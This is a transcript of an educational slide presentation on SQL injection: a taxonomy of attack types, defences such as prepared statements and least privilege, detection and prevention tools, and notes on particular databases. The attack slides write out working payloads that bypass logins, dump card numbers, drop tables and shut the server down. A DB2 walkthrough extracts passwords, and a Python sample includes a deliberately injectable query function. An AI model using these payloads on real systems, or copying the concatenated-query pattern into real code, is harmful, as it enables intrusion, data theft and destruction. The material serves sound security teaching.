
SQL Injection Attack SQLIA


marius

Presentation Transcript



    5. Types of SQLIA:
       Tautologies
       Illegal/Logically Incorrect Queries
       Union Query
       Piggy-Backed Queries
       Stored Procedures
       Inference
       Alternate Encodings

    6. Tautologies attack
       Example: the login field is given the value ' or 1=1 --, so the application builds the query:
       SELECT accounts FROM users WHERE login='' or 1=1 -- AND pass='' AND pin=
       The comment sequence discards the rest of the WHERE clause, and 1=1 makes the remaining condition true for every row.


    8. Illegal/Logically Incorrect Queries attack
       Example: the pin field is given convert(int,(select top 1 name from sysobjects where xtype='u')), producing:
       SELECT accounts FROM users WHERE login='' AND pass='' AND pin= convert(int,(select top 1 name from sysobjects where xtype='u'))
       SQL Server answers with the error:
       "Microsoft OLE DB Provider for SQL Server (0x80040E07) Error converting nvarchar value 'CreditCards' to a column of data type int."
       The error text itself discloses the name of the first user table, CreditCards.


    10. Union Query attack
        Example: the login field is given ' UNION SELECT cardNo from CreditCards where acctNo=10032 --, producing:
        SELECT accounts FROM users WHERE login='' UNION SELECT cardNo from CreditCards where acctNo=10032 -- AND pass='' AND pin=
        The first SELECT matches no row, so what the application displays is the card number returned by the second SELECT.


    12. Piggy-Backed Queries attack
        Example: the pass field is given '; drop table users --, producing:
        SELECT accounts FROM users WHERE login='doe' AND pass=''; drop table users -- ' AND pin=123
        If the database executes the second statement, the users table is dropped.


    14. Stored Procedures attack
        Example stored procedure (it builds its query by string concatenation, so it is as injectable as inline SQL):
        CREATE PROCEDURE DBO.isAuthenticated
          @userName varchar2, @pass varchar2, @pin int
        AS
          EXEC("SELECT accounts FROM users WHERE login='" +@userName+ "' and pass='" +@pass+ "' and pin=" +@pin);
        GO
        Giving the pass field '; SHUTDOWN; -- produces:
        SELECT accounts FROM users WHERE login='doe' AND pass=''; SHUTDOWN; -- AND pin=


    16. Inference attack
        The attacker learns from how the application behaves rather than from data it returns. One form is blind injection:
        Example: the login field is given legalUser' and 1=0 -- and then legalUser' and 1=1 --, producing:
        SELECT accounts FROM users WHERE login='legalUser' and 1=0 -- ' AND pass='' AND pin=0
        SELECT accounts FROM users WHERE login='legalUser' and 1=1 -- ' AND pass='' AND pin=0
        If the two responses differ (a login error for the first, a normal page for the second), the login field is injectable.


    19. Alternate Encodings attack
        Example: the login field is given legalUser'; exec(char(0x73687574646f776e)) --, producing:
        SELECT accounts FROM users WHERE login='legalUser'; exec(char(0x73687574646f776e)) -- AND pass='' AND pin=
        The hexadecimal value is the ASCII encoding of the word shutdown, so a filter that looks for that keyword never sees it.

    20. Prevention of SQLIA:
        Prepared statement
        Stored Procedure
        Escaping All User Supplied Input
        Least Privilege
        White List Input Validation

    21. Prepared statement
        The query text is defined first and the parameters are bound afterwards, with type checking, so an input such as ' or 1=1 -- is passed to the database as a literal value and is never parsed as SQL.
        Parameterized APIs:
        PreparedStatement in Java EE
        SqlCommand or OleDbCommand in .NET
        PDO in PHP
        CreateQuery in Hibernate
        Example using PreparedStatement in Java:
        String custname = request.getParameter("customerName");
        String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
        PreparedStatement pstmt = connection.prepareStatement( query );
        pstmt.setString( 1, custname);
        ResultSet results = pstmt.executeQuery( );

    22. Stored procedure
        Same idea as a prepared statement, but the SQL is defined and stored in the database rather than in application code. A procedure that builds its query dynamically (as on slide 14) gives no protection.
        Example calling a stored procedure from Java:
        String custname = request.getParameter("customerName");
        CallableStatement cs = connection.prepareCall("{call sp_getAccountBalance(?)}");
        cs.setString(1, custname);
        ResultSet results = cs.executeQuery();

    23. Escaping User Input
        Escaping is a blacklist approach: characters with meaning in the query (such as ') are replaced by an escaped form ('') before the value is concatenated into the query. It is a weaker option than the two techniques above.
        Example using mysql_real_escape_string() in PHP:
        $query = sprintf("SELECT * FROM `Users` WHERE UserName='%s' AND Password='%s'",
                         mysql_real_escape_string($Username),
                         mysql_real_escape_string($Password));
        mysql_query($query);
        Escaping rules are DBMS-specific; Oracle, MySQL and SQL Server each differ.

    24. Least privilege
        Limit the damage of a successful SQLIA by limiting the privileges of the database account the application uses: an account that only needs to read data gets read access only.
        Use views to expose only the tables and columns the application needs.
        Do not run the DBMS itself as root or system (MySQL on Windows, for example, runs as system by default).

    25. White List Input Validation
        Define what valid input looks like and reject everything else, instead of trying to enumerate bad input. For structured fields (email address, zip code) a regular expression describes the valid form.
        Free-text fields are harder to describe; at least reject non-printable characters.
        Validation helpers in ESAPI: getValidDate(), getValidCreditCard(), getValidSafeHTML(), getValidInput(), getValidNumber(), getValidFileName(), getValidRedirectLocation()
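As an added example (not part of the presentation), the string-built query from the attack slides next to the parameterized, white-listed form from slides 21 and 25, run in Python against a constructed in-memory SQLite database with the tautology and union inputs from slides 6 and 10:

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory sample data (not the presentation's data). The
    # CreditCards table mirrors the one named in the Union Query slide.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (login TEXT, pass TEXT, pin INTEGER, accounts TEXT);
        INSERT INTO users VALUES ('doe', 's3cret', 123, 'ACCT-1');
        INSERT INTO users VALUES ('alice', 'hunter2', 456, 'ACCT-2');
        CREATE TABLE CreditCards (acctNo INTEGER, cardNo TEXT);
        INSERT INTO CreditCards VALUES (10032, 'CARD-10032');
    """)
    return conn

def lookup_concat(conn, login, pwd, pin):
    # Vulnerable form: the three fields are spliced into the SQL text exactly
    # as the attack slides show, so quotes, comments and UNION in the input
    # become part of the statement.
    sql = ("SELECT accounts FROM users WHERE login='" + login +
           "' AND pass='" + pwd + "' AND pin=" + pin)
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn, login, pwd, pin):
    # Hardened form: white-list the numeric field first (reject, do not
    # repair), then bind every value through a placeholder so the driver
    # hands it to the database as data that is never parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,6}", pin):
        return []
    sql = "SELECT accounts FROM users WHERE login=? AND pass=? AND pin=?"
    return [row[0] for row in conn.execute(sql, (login, pwd, int(pin)))]

# Inputs taken from the Tautologies and Union Query slides.
TAUTOLOGY = "' or 1=1 --"
UNION = "' UNION SELECT cardNo from CreditCards where acctNo=10032 --"

if __name__ == "__main__":
    db = make_db()
    for label, login, pwd in (("normal", "doe", "s3cret"),
                              ("tautology", TAUTOLOGY, ""),
                              ("union", UNION, "")):
        print(label, "concat:", lookup_concat(db, login, pwd, "123"),
              "param:", lookup_param(db, login, pwd, "123"))
```

Python's sqlite3 runs only one statement per execute() call, so the piggy-backed input from slide 12 fails even in the vulnerable function for a driver reason, not because that code is safe.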

    27. SQLIA detection tools
        WAVES
        DBC-Checker
        WebSSARI: static analysis of PHP code, with runtime guards inserted where the analysis cannot prove input safe.

    28. SQLIA detection tools (continued)
        Java Static Tainting: user input is marked as tainted and its flow into query construction is tracked statically. Weakness: false positives.
        SecuriFly: taint-tracking patterns are specified in PQL.
        SQL DOM: queries are built through an API of query objects instead of strings, so type checking applies to every part of the query.

    30. SQLIA prevention tools
        SQL Guard
        SQL Check
        Proxy filtering: a filtering proxy enforces an input policy written in a policy language (SPDL).
        SQLrand: SQL keywords are randomized with a secret key; a proxy de-randomizes queries before they reach the database, so injected keywords are rejected. Weakness: depends on the secrecy of the key and on the proxy.
        SAFELI

    31. SQLIA prevention tools (continued)
        Java Dynamic Tainting: taint is tracked at runtime with a flag on the data, and untainting happens where the data is checked.
        SWaddler
        Tautology Checker: detects tautologies in queries.
        AMNESIA: combines static analysis (a model of the queries the application can legitimately issue) with runtime monitoring (each query is checked against the model; one that violates it is treated as SQLI and blocked).
        CANDID: dynamic candidate evaluation; the query is compared against a candidate query built from benign input, and a structural difference indicates SQLI.

    34. SQLIA in specific database products:
        Oracle: SQL injection in web apps
        SQL injection in PostgreSQL
        SQL Injection in SQL Server
        SQL injection in DB2
        SQL injection in MySQL

    35. SQL injection in PostgreSQL: sleep function

    36. Exploiting Blind SQL Injection in PostgreSQL

    38. SQL Injection in SQL Server
        With an account that is allowed to use OPENROWSET, an injected query can open any ODBC data source the server can reach (Excel files, local MS Access databases, other servers).
        Timing attack: waitfor delay '0:0:5'
        Countermeasures: use a parameterised API; apply the registry patch that disables 'ad-hoc' OPENROWSET queries.

    39. SQL injection in DB2
        Walkthrough using DB2's detailed error messages:
        Username = ' or 1=1--
          response: Welcome Bob
        Username = ' group by 1--  (only useful if the page shows database errors)
          error: An expression starting with "NAME" specified in a SELECT clause<snip>
        Username = ' group by name--
          error: An expression starting with "SOCIAL_SECURITY_NO" specified in a SELECT clause<snip>
        Column names can also be found by brute force. Finding the table name:
        Username = ' or ' ' or ; 9,9,9
          error: An unexpected token "from applogin where name = '' OR" was found<snip>
        Reading the data:
        Username = ' union all select concat(name,password) as name ,'a','a','a' from applogin where name > 'c';
          response: Welcome joeqwerty

    40. MySQL: MySQL.com Victim of SQL Injection Attack
        The injectable input was the id parameter in the URL of the site's Customer View page.

    42. Countermeasures:
        Use mysql_escape_string on values placed in SQL queries.
        Use bind variables and parametrized SQL statements instead of string concatenation.
        Treat every value that enters the application, from whatever source, as untrusted and validate it.

    43. References
        W. G. J. Halfond, J. Viegas, and A. Orso. A Classification of SQL Injection Attacks and Countermeasures. College of Computing, Georgia Institute of Technology, IEEE, 2006, pp. 1-11.
        S. W. Boyd and A. D. Keromytis. SQLrand: Preventing SQL Injection Attacks. In Proceedings of the 2nd Applied Cryptography and Network Security (ACNS) Conference, pp. 292-302, June 2004.
        A. Tajpour, M. Massrum, and M. Z. Heydari. Comparison of SQL Injection Detection and Prevention Techniques. 2nd International Conference on Education Technology and Computer (ICETC), 2010, pp. 1-6.
        P. Bisht and P. Madhusudan. CANDID: Dynamic Candidate Evaluations for Automatic Prevention of SQL Injection Attacks. Proceedings of the 14th ACM Conference on Computer and Communications Security, ACM, 2007, pp. 3-4.
        V. Haldar, D. Chandra, and M. Franz. Dynamic Taint Propagation for Java. In Proceedings of the 21st Annual Computer Security Applications Conference, Dec. 2005.
        M. Martin, B. Livshits, and M. S. Lam. Finding Application Errors and Security Flaws Using PQL: A Program Query Language. In Proceedings of the 20th Annual ACM SIGPLAN Conference on Object-Oriented Programming, Systems, Languages, and Applications (OOPSLA 2005).
        Y. Huang, F. Yu, C. Hang, C. H. Tsai, D. T. Lee, and S. Y. Kuo. Securing Web Application Code by Static Analysis and Runtime Protection. In Proceedings of the 12th International World Wide Web Conference (WWW 04), May 2004.
        M. Cova and D. Balzarotti. Swaddler: An Approach for the Anomaly-based Detection of State Violations in Web Applications. In Proceedings of the 10th International Symposium on Recent Advances in Intrusion Detection (RAID), Queensland, Australia, September 5-7, 2007.
        SQL Injection in Oracle Forms V1.01. Red-Database-Security GmbH, 2005.
        C. Peikari and S. Fogie. Guarding Against SQL Server Attacks: Hacking, Cracking, and Protection Techniques. AirScanner, 2003.
        C. Anley. Advanced SQL Injection. NGSSoftware Insight Security Research (NISR), 2002.
        A. Tajpour, M. Massrum, M. Z. Heydari, and S. Ibrahim. SQL Injection Detection and Prevention Tools Assessment. IEEE, 2010, pp. 1-5.
        J. Pullicino. MySQL.com Victim of SQL Injection Attack. April 2011.
        L. Juranic. Advanced PostgreSQL SQL Injection and Filter Bypass Techniques. INFIGO-TD, 2009.
        S. Kost. An Introduction to SQL Injection Attacks for Oracle Developers. March 2009.
        How to mine data from a DB2 database with SQL injection. archives.neohapsis.com.